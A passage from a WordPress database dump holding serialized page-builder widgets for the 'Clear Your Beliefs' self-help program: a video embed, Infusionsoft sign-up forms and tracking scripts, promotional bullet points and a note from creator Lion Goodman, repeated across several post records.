I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1295, 1755, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:292:"<center>\n<div class="video-shadow">\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1382:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1953:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1129:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button">\n        <input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1296, 1756, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:292:"<center>\n<div class="video-shadow">\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1382:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1953:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /></p><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></p><form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> <br /><div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><p><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script><br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1128:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"</div>\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button">\n        <input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1298, 1758, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:292:"<center>\n<div class="video-shadow">\n<div class="embed-responsive embed-responsive-16by9">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></iframe>\n</div>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1382:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1953:"<p>[su_box title="Free App" box_color="#1a2d8c" radius="8"]</p><center style="margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><p><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input 